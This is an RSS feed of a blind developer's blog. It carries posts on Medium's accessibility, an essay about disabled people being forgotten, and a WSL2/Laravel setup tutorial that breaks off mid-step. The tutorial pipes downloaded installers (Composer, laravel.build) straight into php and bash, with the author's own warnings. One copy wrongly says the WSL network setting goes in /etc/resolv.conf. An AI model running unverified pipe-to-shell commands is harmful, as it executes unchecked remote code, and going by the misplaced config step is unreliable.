<?xml version="1.0" encoding="UTF-8"?><rss version="2.0" xmlns:content="http://purl.org/rss/1.0/modules/content/">
  <channel>
    <title>Florian Beijers</title>
    <link>https://florianbeijers.xyz/</link>
    <description>Because everybody needs a spot on the web these days</description>
    <pubDate>Mon, 20 Apr 2026 00:48:10 +0000</pubDate>
    <item>
      <title>Back, I Am: What’s changed?</title>
      <link>https://florianbeijers.xyz/back-i-am-whats-changed?pk_campaign=rss-feed</link>
      <description>&lt;![CDATA[Honestly, a lot. Also not all that much. It’s complicated.&#xA;I’ve had a chance to grow up over the last 4–5 years. I’ve been places, worked on various projects, developed new interests. What hasn’t changed is my overall stance on accessibility, on teaching it forward and on calling ’em how I see ’em where blatant disregard or lack of care is concerned. On that note:&#xA;Medium: really, folks?&#xA;&#xA;Before I get into it, please note that this is a free copy of an article on Medium. Some of the rest of the article won&#39;t make sense without that context.&#xA;&#xA;A number of years ago, I wrote an article stating that Medium was not viable as a platform for me to write on, due to their stance, or lack thereof, on accessibility.&#xA;That, I’m sorry to say, hasn’t changed all that much.&#xA;My biggest complaint, the lack of alt text on the platform, has been somewhat mitigated. At least, it’s possible to add alt text now, which is one of the reasons I’m able to justify to myself to even write on this platform.&#xA;The editor is pretty much as inaccessible as it’s always been, with very limited hotkey support, a lot of mouse-only operations, piles and piles of unlabeled buttons which could be fixed with literally ten seconds of work, the list goes on. Case in point: it took me five minutes to even put in this second heading, and it’s not of the correct hierarchical level. But then, given Medium only allows for 2 heading levels, I guess the point is mostly moot.&#xA;Does Medium care about accessibility? Quite honestly I doubt it. It’s hard to say; this kind of neglect is often a matter of upper management not seeing the need, the room etc. to accommodate about a seventh of the world’s population. The developers themselves are far more often far more willing to put in the work, they’re often just not allowed to spend time on it. Make of that what you will.&#xA;So why still write on it? Quite simply, so people can find it.
I can’t get around the fact that Medium is huge. It comes up on search engine result pages, it is apparently important enough for people to become premium members just to read articles on it.&#xA;Having said that, Medium will NEVER be the only place any article of mine shows up. I am on here so I can have my content available to those who need it. I may even paywall my articles on here so I can earn a small amount of money from them, but there will always be a link to a free version in order to not lock out potential readers.&#xA;TLDR: I’ll be on here. I won’t have to like it, though. ;)&#xA;&#xA;My older articles: accurate still?&#xA;For the most part, yes. What follows is an itemized list of things I can remember having mentioned over those couple articles, and their current status:&#xA;Jetbrains’ IDEs have gotten a little bit better, but they’re still a pain to use with screen readers.&#xA;I think I may have mentioned Slack and Discord in the past. Those are definitely a lot better than they used to be.&#xA;Mac OS, in my opinion at least, still lags behind Windows where the maturity of its accessibility offerings is concerned. Things have improved, but in my opinion not improved enough to be one’s main workhorse for anything but music creation, where it does shine in certain ways.&#xA;I’m on a Lenovo now! :P&#xA;Some things have changed even throughout the time I wrote my articles, most notably the accessibility improvements in FreeCodeCamp, Codecademy and VS Code. Those are definite victories for accessibility. There have also been some serious groanworthy slips though. Looking at you, Notion.&#xA;&#xA;What about yours truly?&#xA;Honestly I’ve been all over the place. 
I was lead coder on a text-based game for a while, consulted on a boatload of projects as an accessibility auditor/advocate, kept up ye olde programming, the works.&#xA;Two relatively new things are that I’m a Twitch streamer now, I go by Zersiax, and that I’ve developed a serious appreciation and interest for cybersecurity. On that note, more posts surrounding those topics will no doubt feature in the coming time.&#xA;Streams largely cover accessibility in gaming, game development and overall ways to work around inaccessible content in certain types of games, as well as the occasional coding or hacking stream. Cybersecurity might be anything from capture the flag writeups to accessibility reviews of tools, courses, etc.&#xA;These are severely undercovered fields, and I’d like to try to do my part. With that though, this article has reached its end.]]&gt;</description>
      <content:encoded><![CDATA[<p>Honestly, a lot. Also not all that much. It’s complicated.
I’ve had a chance to grow up over the last 4–5 years. I’ve been places, worked on various projects, developed new interests. What hasn’t changed is my overall stance on accessibility, on teaching it forward and on calling ’em how I see ’em where blatant disregard or lack of care is concerned. On that note:</p>

<h2 id="medium-really-folks">Medium: really, folks?</h2>

<p>Before I get into it, please note that this is a free copy of an article on Medium. Some of the rest of the article won&#39;t make sense without that context.</p>

<p>A number of years ago, I wrote an article stating that Medium was not viable as a platform for me to write on, due to their stance, or lack thereof, on accessibility.
That, I’m sorry to say, hasn’t changed all that much.
My biggest complaint, the lack of alt text on the platform, has been somewhat mitigated. At least, it’s possible to add alt text now, which is one of the reasons I’m able to justify to myself to even write on this platform.
The editor is pretty much as inaccessible as it’s always been, with very limited hotkey support, a lot of mouse-only operations, piles and piles of unlabeled buttons which could be fixed with literally ten seconds of work, the list goes on. Case in point: it took me five minutes to even put in this second heading, and it’s not of the correct hierarchical level. But then, given Medium only allows for 2 heading levels, I guess the point is mostly moot.
Does Medium care about accessibility? Quite honestly I doubt it. It’s hard to say; this kind of neglect is often a matter of upper management not seeing the need, the room etc. to accommodate about a seventh of the world’s population. The developers themselves are far more often far more willing to put in the work, they’re often just not allowed to spend time on it. Make of that what you will.
So why still write on it? Quite simply, so people can find it. I can’t get around the fact that Medium is huge. It comes up on search engine result pages, it is apparently important enough for people to become premium members just to read articles on it.
Having said that, Medium will NEVER be the only place any article of mine shows up. I am on here so I can have my content available to those who need it. I may even paywall my articles on here so I can earn a small amount of money from them, but there will always be a link to a free version in order to not lock out potential readers.
TLDR: I’ll be on here. I won’t have to like it, though. ;)</p>

<h2 id="my-older-articles-accurate-still">My older articles: accurate still?</h2>

<p>For the most part, yes. What follows is an itemized list of things I can remember having mentioned over those couple articles, and their current status:
*  Jetbrains’ IDEs have gotten a little bit better, but they’re still a pain to use with screen readers.
* I think I may have mentioned Slack and Discord in the past. Those are definitely a lot better than they used to be.
* Mac OS, in my opinion at least, still lags behind Windows where the maturity of its accessibility offerings is concerned. Things have improved, but in my opinion not improved enough to be one’s main workhorse for anything but music creation, where it does shine in certain ways.
* I’m on a Lenovo now! :P
Some things have changed even throughout the time I wrote my articles, most notably the accessibility improvements in FreeCodeCamp, Codecademy and VS Code. Those are definite victories for accessibility. There have also been some serious groanworthy slips though. Looking at you, Notion.</p>

<h2 id="what-about-yours-truly">What about yours truly?</h2>

<p>Honestly I’ve been all over the place. I was lead coder on a text-based game for a while, consulted on a boatload of projects as an accessibility auditor/advocate, kept up ye olde programming, the works.
Two relatively new things are that I’m a Twitch streamer now, <a href="https://twitch.tv/zersiax">I go by Zersiax</a>, and that I’ve developed a serious appreciation and interest for cybersecurity. On that note, more posts surrounding those topics will no doubt feature in the coming time.
Streams largely cover accessibility in gaming, game development and overall ways to work around inaccessible content in certain types of games, as well as the occasional coding or hacking stream. Cybersecurity might be anything from capture the flag writeups to accessibility reviews of tools, courses, etc.
These are severely undercovered fields, and I’d like to try to do my part. With that though, this article has reached its end.</p>
]]></content:encoded>
      <guid>https://florianbeijers.xyz/back-i-am-whats-changed</guid>
      <pubDate>Wed, 22 Nov 2023 23:53:50 +0000</pubDate>
    </item>
    <item>
      <title>A Story from the Great Beyond: The Disabled Ghosts of Earth</title>
      <link>https://florianbeijers.xyz/a-story-from-the-great-beyond-the-disabled-ghosts-of-earth?pk_campaign=rss-feed</link>
      <description>&lt;![CDATA[Hello, reader. I ask you, can you see me?&#xA;Do you know of me?&#xA;I can&#39;t see you. I know of you, though. I live among you, flicker in and out of your existence like a fluorescent light on the fritz.&#xA;I&#39;m at the edge of your awareness, yanked into being from time to time by an errant thought, a sentence on a page, a sound byte.&#xA;Some of you even catch a true glimpse of us. The community beyond the bubble, the segregated, the ones you had forgotten about and soon will again.&#xA;Do you know who I am, yet?&#xA;&#xA;I work&#xA;&#xA;I&#39;m a fully blind individual who has worked several jobs. Let&#39;s run down the list:&#xA;I was a telemarketer&#xA;&#xA;One of those annoying ones that try to sell you stuff. I came down your phone line trying to sell you energy contracts, or phone plans. &#xA;Or well... I did that for a few days. After that, I was relegated to a simpler script, that just had me asking if a particular piece of mail had come in that day.&#xA;Why?&#xA;Because the software to run through the call scripts was not built with accessibility in mind. Initially, I couldn&#39;t even do the simple script. It required custom-written screen reader scripts in order to make the software on my work computer behave. People had forgotten to keep me in mind when writing the software. My reminder came too late; the software was already finished and could no longer be altered. This simple script was all I could get it to do reliably. And I&#39;m sure I&#39;ve since been forgotten about again. Several ghosts may have come and gone since I left, all running into the same barrier. Is it any wonder they feel like they need psychics to speak to us? Nobody tends to hear us otherwise...&#xA;&#xA;I&#39;m a Programmer&#xA;&#xA;These days, more as a hobby than a profession, but I still consider myself a programmer by trade.&#xA;I worked several jobs in this field. I worked on various backends, various websites.
&#xA;I worked for companies who all figured I could make them money, as long as I didn&#39;t cost them any. &#xA;I was in a state of Quantum Remembrance: People gave me enough to be able to work for them, but not enough to make their tools workable by those like me. This wasn&#39;t our demographic, not our target audience. I could work on that if I had time to spare, or in my spare time. Or not at all.&#xA;Time to spare as a blind programmer doesn&#39;t exist. Things, particularly when working for a company with heaps of different projects, take a bit longer to onboard. More than anything else though, I was busy reminding folks I exist.&#xA;Tools my colleagues used were not accessible. Tools I used myself became inaccessible. &#xA;&#xA;  &#34;We have a new UI, isn&#39;t it great?&#34; &#xA;  &#34;No... it&#39;s not. You forgot I exist again...&#34;&#xA;&#xA;A blind programmer working both as a freelancer as well as a corporate wage slave plays a perpetual game of Russian roulette. It&#39;s like a plumber working with explosive tools; time bombs with an unknown amount of time on the timer. &#xA;Wake up one day, your tools have all blown up and there&#39;s no way to get them back. Scrounge around for new tools, all while trying to meet your quota, make your appointments.&#xA;Just like politicians lording over the slums they will never visit, developers writing websites, web apps, dev tools, productivity software toss their creations over the fence thinking they&#39;re doing the best they can for everyone.&#xA;They do... they just forgot I exist...&#xA;Until I, or someone like me, reminds them. A flicker of an ethereal presence, a ghostly whisper, easily ignored, easily squashed by reasonings of science, of business. &#xA;&#xA;  &#34;You must be mistaken... ghosts wouldn&#39;t use our products...
would they?&#34; &#xA;&#xA;I&#39;m a Shaman&#xA;&#xA;A shaman, in some versions of the title, acts like a bridge between the realm of the living and the realm of the dead.&#xA;I currently work as an accessibility manager for a QA firm. I guess I am a shamanager.&#xA;I teach the rituals needed to commune with the ghosts within the outskirts of our reality, but even more so, I act as a reminder of those outskirts. I, after all, am myself one of these ghosts.&#xA;&#xA;Quick check... do you still remember me?&#xA;&#xA;I get to build bridges, I get to bring the outskirts into the spotlight as it were. I work with a willing group of people who want to see through the barrier. And yet, I need to make sure I&#39;m not forgotten, or all my teachings will similarly be forgotten when they are needed most. Not on purpose, of course, just... slipped the mind. Nobody means to, of course...&#xA;&#xA;  Can you still hear me, dear reader?&#xA;&#xA;I Am&#xA;&#xA;Outside of work, one is free. That is the idea, right? Work-life balance. Work stops when you clock out for the day.&#xA;The work of a ghost never ends, though. For a ghost, life is work. You go to your job, where you work, then you go home, where you work.&#xA;You work, for to leisure in a world where a system is not built for ghosts is to disappear into obscurity. Until you owe money. People seem to suddenly remember you exist when you owe money. It&#39;s interesting how that works.&#xA;When you owe money, reality tips over, because you suddenly end up in a reality where every ghost is thought to have their own shaman to bridge the gaps. &#xA;A ghost can&#39;t always hold a pen, or use one, or read a form. The powers that be who sent the form will ask such unfortunate ghosts to employ their shaman to help them, expecting the poor, unsuspecting ectoplasmic entity to divulge all their personal ghastly secrets to this individual. &#xA;Let me divulge one of those mystical workings though: a lot of ghosts haunt alone. 
No shaman in sight. You forgot we existed again, didn&#39;t you?&#xA;&#xA;ESP?&#xA;&#xA;How did we get here? That, my dear reader, is a story spanning many ages, many decisions and many mistakes. But we did get here.&#xA;Most mainstream media is not ghost-proof. Most video games, memes, websites, physical spaces, get-togethers, communities and events exclude one type of ghost or another, often knowingly so.&#xA;A lot of communication methods are not inclusive to a lot of different types of ghosts. Different communities the world is rather not reminded of too often; pray tell it might ruin the Elysium we are meant to believe we&#39;ve built in our post-enlightened state. &#xA;Slowly, agonizingly, agonizingly slowly, it appears we as a collective species are starting to develop some ESP. Extrasensory perception. The ability to look outside one&#39;s bubble to see what&#39;s happening outside the sand dune our collective heads have been stuffed down for most of our existences. Is it enough?&#xA;Will the 2020s, the 2030s, the 2040s be the decade where we decide to let our ghosts be humans again? Where the segregated communities can have their culture without being entirely excluded from the overall collective consciousness the many enjoy?&#xA;Where ghosts play, watch, discuss and consume the same content, at the same time the non-ghosts do?&#xA;Or will we remain as we are? Formless spectres, at times drawn into clarity by an errant thought, or word, or sound byte?&#xA;For the moment, I thrive in my little ghostly existence. I browbeat when I need to browbeat, and I work around the obstacles unknowing, unsuspecting ghostists place on my path. I&#39;d certainly not mind a bit more than a ghost of a chance though. Nice as luck can be, it does tend to run out at times.&#xA;&#xA;What say you, dear reader? Do you still remember me?&#xA;Will you, 10 minutes from now? ..w abo.. ...orrow? Wh.................???&#xA;&#xA;]]&gt;</description>
      <content:encoded><![CDATA[<p>Hello, reader. I ask you, can you see me?
Do you know of me?
I can&#39;t see you. I know of you, though. I live among you, flicker in and out of your existence like a fluorescent light on the fritz.
I&#39;m at the edge of your awareness, yanked into being from time to time by an errant thought, a sentence on a page, a sound byte.
Some of you even catch a true glimpse of us. The community beyond the bubble, the segregated, the ones you had forgotten about and soon will again.
Do you know who I am, yet?</p>

<h2 id="i-work">I work</h2>

<p>I&#39;m a fully blind individual who has worked several jobs. Let&#39;s run down the list:</p>

<h3 id="i-was-a-telemarketer">I was a telemarketer</h3>

<p>One of those annoying ones that try to sell you stuff. I came down your phone line trying to sell you energy contracts, or phone plans.
Or well... I did that for a few days. After that, I was relegated to a simpler script, that just had me asking if a particular piece of mail had come in that day.
<strong>Why?</strong>
Because the software to run through the call scripts was not built with accessibility in mind. Initially, I couldn&#39;t even do the simple script. It required custom-written screen reader scripts in order to make the software on my work computer behave. People had forgotten to keep me in mind when writing the software. My reminder came too late; the software was already finished and could no longer be altered. This simple script was all I could get it to do reliably. And I&#39;m sure I&#39;ve since been forgotten about again. Several ghosts may have come and gone since I left, all running into the same barrier. Is it any wonder they feel like they need psychics to speak to us? Nobody tends to hear us otherwise...</p>

<h3 id="i-m-a-programmer">I&#39;m a Programmer</h3>

<p>These days, more as a hobby than a profession, but I still consider myself a programmer by trade.
I worked several jobs in this field. I worked on various backends, various websites.
I worked for companies who all figured I could make them money, as long as I didn&#39;t cost them any.
I was in a state of Quantum Remembrance: People gave me enough to be able to work for them, but not enough to make their tools workable by those like me. This wasn&#39;t our demographic, not our target audience. I could work on that if I had time to spare, or in my spare time. Or not at all.
Time to spare as a blind programmer doesn&#39;t exist. Things, particularly when working for a company with heaps of different projects, take a bit longer to onboard. More than anything else though, I was busy reminding folks I exist.
Tools my colleagues used were not accessible. Tools I used myself became inaccessible.</p>

<blockquote><p>“We have a new UI, isn&#39;t it great?”
“No... it&#39;s not. You forgot I exist again...”</p></blockquote>

<p>A blind programmer working both as a freelancer as well as a corporate wage slave plays a perpetual game of Russian roulette. It&#39;s like a plumber working with explosive tools; time bombs with an unknown amount of time on the timer.
Wake up one day, your tools have all blown up and there&#39;s no way to get them back. Scrounge around for new tools, all while trying to meet your quota, make your appointments.
Just like politicians lording over the slums they will never visit, developers writing websites, web apps, dev tools, productivity software toss their creations over the fence thinking they&#39;re doing the best they can for everyone.
They do... they just forgot I exist...
Until I, or someone like me, reminds them. A flicker of an ethereal presence, a ghostly whisper, easily ignored, easily squashed by reasonings of science, of business.</p>

<blockquote><p>“You must be mistaken... ghosts wouldn&#39;t use our products... would they?”</p></blockquote>

<h3 id="i-m-a-shaman">I&#39;m a Shaman</h3>

<p>A shaman, in some versions of the title, acts like a bridge between the realm of the living and the realm of the dead.
I currently work as an accessibility manager for a QA firm. I guess I am a shamanager.
I teach the rituals needed to commune with the ghosts within the outskirts of our reality, but even more so, I act as a reminder of those outskirts. I, after all, am myself one of these ghosts.</p>

<p><strong>Quick check... do you still remember me?</strong></p>

<p>I get to build bridges, I get to bring the outskirts into the spotlight as it were. I work with a willing group of people who want to see through the barrier. And yet, I need to make sure I&#39;m not forgotten, or all my teachings will similarly be forgotten when they are needed most. Not on purpose, of course, just... slipped the mind. Nobody means to, of course...</p>

<blockquote><p>Can you still hear me, dear reader?</p></blockquote>

<h2 id="i-am">I Am</h2>

<p>Outside of work, one is free. That is the idea, right? Work-life balance. Work stops when you clock out for the day.
The work of a ghost never ends, though. For a ghost, life is work. You go to your job, where you work, then you go home, where you work.
You work, for to leisure in a world where a system is not built for ghosts is to disappear into obscurity. Until you owe money. People seem to suddenly remember you exist when you owe money. It&#39;s interesting how that works.
When you owe money, reality tips over, because you suddenly end up in a reality where every ghost is thought to have their own shaman to bridge the gaps.
A ghost can&#39;t always hold a pen, or use one, or read a form. The powers that be who sent the form will ask such unfortunate ghosts to employ their shaman to help them, expecting the poor, unsuspecting ectoplasmic entity to divulge all their personal ghastly secrets to this individual.
Let me divulge one of those mystical workings though: a lot of ghosts haunt alone. No shaman in sight. You forgot we existed again, didn&#39;t you?</p>

<h2 id="esp">ESP?</h2>

<p>How did we get here? That, my dear reader, is a story spanning many ages, many decisions and many mistakes. But we did get here.
Most mainstream media is not ghost-proof. Most video games, memes, websites, physical spaces, get-togethers, communities and events exclude one type of ghost or another, often knowingly so.
A lot of communication methods are not inclusive to a lot of different types of ghosts. Different communities the world is rather not reminded of too often; pray tell it might ruin the Elysium we are meant to believe we&#39;ve built in our post-enlightened state.
Slowly, agonizingly, agonizingly slowly, it appears we as a collective species are starting to develop some ESP. Extrasensory perception. The ability to look outside one&#39;s bubble to see what&#39;s happening outside the sand dune our collective heads have been stuffed down for most of our existences. Is it enough?
Will the 2020s, the 2030s, the 2040s be the decade where we decide to let our ghosts be humans again? Where the segregated communities can have their culture without being entirely excluded from the overall collective consciousness the many enjoy?
Where ghosts play, watch, discuss and consume the same content, at the same time the non-ghosts do?
Or will we remain as we are? Formless spectres, at times drawn into clarity by an errant thought, or word, or sound byte?
For the moment, I thrive in my little ghostly existence. I browbeat when I need to browbeat, and I work around the obstacles unknowing, unsuspecting ghostists place on my path. I&#39;d certainly not mind a bit more than a ghost of a chance though. Nice as luck can be, it does tend to run out at times.</p>

<p>What say you, dear reader? Do you still remember me?
Will you, 10 minutes from now? ..w abo.. ...orrow? Wh.................???</p>
]]></content:encoded>
      <guid>https://florianbeijers.xyz/a-story-from-the-great-beyond-the-disabled-ghosts-of-earth</guid>
      <pubDate>Mon, 27 Feb 2023 21:12:02 +0000</pubDate>
    </item>
    <item>
      <title>Setting up a PHP/Laravel environment on WSL2 and Windows</title>
      <link>https://florianbeijers.xyz/setting-up-a-php-laravel-environment-on-wsl2-and-windows?pk_campaign=rss-feed</link>
      <description>&lt;![CDATA[Intro&#xA;&#xA;To most, choosing an operating system to work in is a voluntary choice, at least for their hobby projects. To some, me included, that isn&#39;t quite a luxury we can afford.&#xA;Varying levels of accessibility, as well as screenreader maturity and the breathing room to run damage control if something suddenly becomes inaccessible or collapses in some other way make Windows 10 the most expedient and effective operating system for most people who are trying to be productive in tech, be it as a developer, data scientist or cybersecurity professional.&#xA;Unfortunately, where development dependencies, tools and applications are concerned, especially these days, Windows is often a second-class citizen. If there are bugs, they will usually happen on the Windows side of things, often with hard to diagnose problems as a result.&#xA;Enter WSL2, essentially a lightweight virtual machine that allows for the use of tools written for Linux within a Windows environment. This opens up a whole bunch of doors that we previously needed to set up a complicated virtual machine strategy for.&#xA;In this article, I&#39;ll go over setting up a PHP/Laravel environment on WSL2, running on Windows 10.&#xA;&#xA;Set up WSL2&#xA;&#xA;The easiest way to set up WSL2 is to follow the official wsl2 setup guide. No accessibility gotchas should be encountered here in most cases.&#xA;There are some reports about AMD users getting an odd prompt when enabling Hyper-V; I will edit this post if I encounter this myself and add remediation steps if any are required.&#xA;&#xA;Now, we are in 2021, so we are doing this the spiffy way. WSL2, VS Code, Docker, the works.&#xA;&#xA;Set up Docker to work with WSL2&#xA;&#xA;I could wax poetic about this process, but there really isn&#39;t all that much to say. First, install Docker and subsequently make sure you set it up correctly with WSL2.&#xA;Why Docker?
Ehh ...it&#39;s the thing to do these days, it normalizes development dependencies like database versions and a tool we get to a little bit later really, really likes it. Ok, onwards! :)&#xA;&#xA;Set up PHP, composer, tweaks&#xA;&#xA;First, let&#39;s make sure we have all the PHP modules we might need down the line installed. Pick and choose from this apt invocation:&#xA;&#xA;sudo apt-get update&#xA;sudo apt install unzip php php-cli php-fpm php-json php-intl php-common php-mysql php-zip php-gd php-mbstring php-curl php-xml php-pear php-bcmath -yqq&#xA;&#xA;The flags essentially make it so apt doesn&#39;t bother us while setting all that up (-y answers the confirmation prompt, -qq keeps the output quiet). This shouldn&#39;t take super long, but at least this way you can do something else while it&#39;s happening.&#xA;&#xA;Next, we need to install composer, the PHP package manager. A nifty little oneliner:&#xA;&#xA;curl -sS https://getcomposer.org/installer | php \&#xA;            &amp;&amp; sudo mv composer.phar /usr/local/bin/ \&#xA;            &amp;&amp; sudo ln -s /usr/local/bin/composer.phar /usr/local/bin/composer&#xA;&#xA;Be aware that this runs whatever the download returns without checking it. Composer publishes the installer&#39;s SHA-384 at https://composer.github.io/installer.sig; if you would rather not pipe an unverified script into php, save the installer to a file, compare its hash against that value and only then run it.&#xA;Quick little aside, you ideally want to stay within the Linux filesystem while doing WSL2 stuff. The mounted folder where your Windows user folder is, is significantly slower within WSL2, so doing a quick cd ~ so you can operate from within your Linux home folder is probably worth it.&#xA;Next, in order to prepare for Laravel Valet, which is normally Mac only but was ported to Linux, we need to stop WSL from regenerating /etc/resolv.conf on every start. That setting lives in /etc/wsl.conf (not in resolv.conf itself). Add:&#xA;&#xA;[network]&#xA;generateResolvConf=false&#xA;&#xA;These lines may already be there, just commented out. If so, have them not be commented out anymore. The change only takes effect once the distro is restarted (wsl --shutdown from a Windows shell does it).
;)&#xA;&#xA;Laravel Valet, Takeout, all the good stuff&#xA;&#xA;First, let&#39;s install the Linux port of Valet and the Takeout Docker container manager using composer:&#xA;&#xA;composer global require cpriego/valet-linux tightenco/takeout&#xA;&#xA;Composer does not automatically add its global bin folder to the PATH variable, so let&#39;s do that so we can run commands in there without having to go to the directory every time. Add this to ~/.bashrc:&#xA;&#xA;export PATH=~/.config/composer/vendor/bin:$PATH&#xA;&#xA;And then run a simple &#34;source ~/.bashrc&#34; to load in the changes.&#xA;&#xA;Next, run valet install to set up the valet tool.&#xA;Valet messes with /etc/resolv.conf, the file we just told WSL to leave alone, turning it into a symlink. We don&#39;t want this, as that will make WSL reinitialize it on every restart. So:&#xA;&#xA;sudo unlink /etc/resolv.conf&#xA;sudo cp /opt/valet-linux/valet-dns /etc/resolv.conf&#xA;&#xA;On searching around a little, it seems we also need to add a file to preempt any odd DNS bugs. Here goes:&#xA;&#xA;sudo touch /opt/valet-linux/dns-servers&#xA;sudo nano /opt/valet-linux/dns-servers&#xA;&#xA;Just adding &#34;nameserver 1.1.1.1&#34; without the quotes in there should be enough. That is the Cloudflare DNS which is pretty speedy, you can also use 8.8.8.8 for the Google DNS, for example.&#xA;Ok! We&#39;re going places! Now, we can start things off with:&#xA;&#xA;valet start&#xA;sudo service php7.4-fpm start&#xA;&#xA;The second command is a failsafe; sometimes valet start on Ubuntu doesn&#39;t seem to start that service properly.&#xA;Now, cd to the folder where your laravel projects will live, say ...~/projects/php, and run valet park.&#xA;&#xA;Next, we need to enable the database.
I prefer PostgreSQL, but there&#39;s a handful that Takeout currently supports.&#xA;There are two ways to do this; running &#34;takeout enable&#34; gives a menu you can arrow through, but given Windows screenreaders haven&#39;t figured out console highlight tracking yet, you&#39;ll probably want to provide the service name yourself, e.g. &#34;takeout enable postgresql&#34;. Follow the instructions and PostgreSQL will run on 127.0.0.1 for projects to use.&#xA;&#xA;Setting up DNS resolution to the WSL2 instance&#xA;&#xA;A cool thing about Valet is that it autoconfigures new projects to be reachable on the *.test domain, routing those to localhost. Except ...WSL2&#39;s localhost isn&#39;t our localhost. &#xA;We can add entries for individual sites to C:/Windows/System32/drivers/etc/hosts to route hosts to 127.0.0.1 individually, or we can use the .localhost top-level domain. To my knowledge, only Chrome currently supports this. If you want to go that route:&#xA;&#xA;valet domain localhost&#xA;&#xA;Installing Laravel&#xA;&#xA;We can install Laravel in several ways, here&#39;s a few.&#xA;&#xA;Using Docker and Laravel Sail&#xA;&#xA;Given we already have Docker set up, we can use a relatively new addition to the Laravel ecosystem, Laravel Sail. To do this, run the following, where the bit after the TLD is the name of the folder for the project:&#xA;&#xA;curl -s https://laravel.build/helloWorld | bash&#xA;&#xA;This pipes a script straight from the web into bash, where it runs with your user&#39;s privileges inside WSL2; if you would rather see what it does first, save it to a file with curl -o and read it before running it. It will do a whole bunch of Docker magic, after which your application will be accessible on projectname.localhost from Chrome. You can read more about Laravel Sail here.&#xA;&#xA;Using Composer&#xA;&#xA;We have composer installed and ready to go, so an alternate way of doing this is by using our already existing infrastructure:&#xA;&#xA;composer global require laravel/installer&#xA;laravel new project-name&#xA;&#xA;Conclusion&#xA;&#xA;From here, the existing docs can take over.
VS Code is a topic in itself, and will probably merit its own post at some point. Using the various extensions it provides, you can work within the WSL2 container, set up your PHP tools on the WSL2 side in order to get linting and static checking support etc.&#xA;That&#39;s enough out of me for now.&#xA;&#xA;]]&gt;</description>
      <content:encoded><![CDATA[<h3 id="intro">Intro</h3>

<p>To most, choosing an operating system to work in is a voluntary choice, at least for their hobby projects. To some, me included, that isn&#39;t quite a luxury we can afford.
Varying levels of accessibility, as well as screenreader maturity and the breathing room to run damage control if something suddenly becomes inaccessible or collapses in some other way, make Windows 10 the most expedient and effective operating system for most people who are trying to be productive in tech, be it as a developer, data scientist or cybersecurity professional.
Unfortunately, where development dependencies, tools and applications are concerned, especially these days, Windows is often a second-class citizen. If there are bugs, they will usually happen on the Windows side of things, often with hard-to-diagnose problems as a result.
Enter WSL2, essentially a lightweight virtual machine that allows for the use of tools written for Linux within a Windows environment. This opens up a whole bunch of doors that we previously needed a complicated virtual machine strategy for.
In this article, I&#39;ll go over setting up a PHP/Laravel environment on WSL2, running on Windows 10.
</p>

<h3 id="set-up-wsl2">Set up WSL2</h3>

<p>The easiest way to set up WSL2 is to follow <a href="https://docs.microsoft.com/en-us/windows/wsl/install-win10">the official WSL2 setup guide</a>. No accessibility gotchas should be encountered here in most cases.
There are some reports about AMD users getting an odd prompt when enabling Hyper-V; I will edit this post if I encounter this myself and add remediation steps if any are required.</p>

<p>Now, we are in 2021, so we are doing this the spiffy way. WSL2, VS Code, Docker, the works.</p>

<h3 id="set-up-docker-to-work-with-wsl2">Set up Docker to work with WSL2</h3>

<p>I could wax poetic about this process, but there really isn&#39;t all that much to say. First, <a href="https://www.docker.com/get-started">install Docker</a> and subsequently <a href="https://docs.docker.com/docker-for-windows/wsl/">make sure you set it up correctly with WSL2</a>.
Why Docker? Ehh ...it&#39;s the thing to do these days; it normalizes development dependencies like database versions, and a tool we get to a little bit later really, really likes it. Ok, onwards! :)</p>

<h3 id="set-up-php-composer-tweaks">Set up PHP, composer, tweaks</h3>

<p>First, let&#39;s make sure we have all the PHP modules we might need down the line installed. Pick and choose from this apt invocation:</p>

<pre><code>sudo apt-get update
sudo apt install unzip php php-cli php-fpm php-json php-intl php-common php-mysql php-zip php-gd php-mbstring php-curl php-xml php-pear php-bcmath -yqq
</code></pre>

<p>The -y and -qq flags essentially make it so apt doesn&#39;t prompt us or flood the terminal while setting all that up. This shouldn&#39;t take super long, but at least this way you can do something else while it&#39;s happening.</p>

<p>Next, we need to install Composer, the PHP package manager. A nifty little one-liner:</p>

<pre><code># Piping a downloaded installer straight into php skips any integrity check;
# the Composer download page publishes the SHA-384 hash of the installer, so
# you can save it as composer-setup.php and verify the hash first if you prefer.
curl -sS https://getcomposer.org/installer | php \
    &amp;&amp; sudo mv composer.phar /usr/local/bin/ \
    &amp;&amp; sudo ln -s /usr/local/bin/composer.phar /usr/local/bin/composer
</code></pre>

<p>Quick little aside: you ideally want to stay within the Linux filesystem while doing WSL2 stuff. The mounted folder holding your Windows user folder is significantly slower to work in from within WSL2, so a quick cd ~ so you can operate from within your Linux home folder is probably worth it.
Next, in order to prepare for Laravel Valet, which is normally Mac-only but was ported to Linux, we need to make a small change in /etc/resolv.conf. Add:</p>

<pre><code>[network]
generateResolvConf=false
</code></pre>

<p>These lines may already be there, just commented out. If so, uncomment them. ;)</p>

<h3 id="laravel-valet-takeout-all-the-good-stuff">Laravel Valet, Takeout, all the good stuff</h3>

<p>First, let&#39;s install the Linux port of Valet and Takeout, the Docker container manager, using Composer:</p>

<pre><code>composer global require cpriego/valet-linux tightenco/takeout
</code></pre>

<p>Composer does not automatically add its global bin folder to the PATH variable, so let&#39;s do that so we can run commands in there without having to go to the directory every time. Add this to ~/.bashrc:</p>

<pre><code>export PATH=~/.config/composer/vendor/bin:$PATH
</code></pre>

<p>And then run a simple “source ~/.bashrc” to load in the changes.</p>

<p>Next, run valet install to set up the Valet tool.
Valet messes with our /etc/resolv.conf, the file we edited just now, turning it into a symlink. We don&#39;t want this, as that will make WSL reinitialize it on every restart. So:</p>

<pre><code>sudo unlink /etc/resolv.conf
sudo cp /opt/valet-linux/valet-dns /etc/resolv.conf
</code></pre>

<p>On searching around a little, it seems we also need to add a file to preempt any odd DNS bugs. Here goes:</p>

<pre><code>sudo touch /opt/valet-linux/dns-servers
sudo nano /opt/valet-linux/dns-servers
</code></pre>

<p>Just adding “nameserver 1.1.1.1” without the quotes in there should be enough. That is Cloudflare&#39;s DNS resolver, which is pretty speedy; you can also use 8.8.8.8 for Google&#39;s DNS, for example.
Ok! We&#39;re going places! Now, we can start things off with:</p>

<pre><code>valet start
sudo service php7.4-fpm start
</code></pre>

<p>The second command is a failsafe; sometimes valet start on Ubuntu doesn&#39;t seem to start that service properly.
Now, cd to the folder where your Laravel projects will live, say, ~/projects/php, and run valet park.</p>

<p>Next, we need to enable the database. I prefer PostgreSQL, but there are a handful that Takeout currently supports.
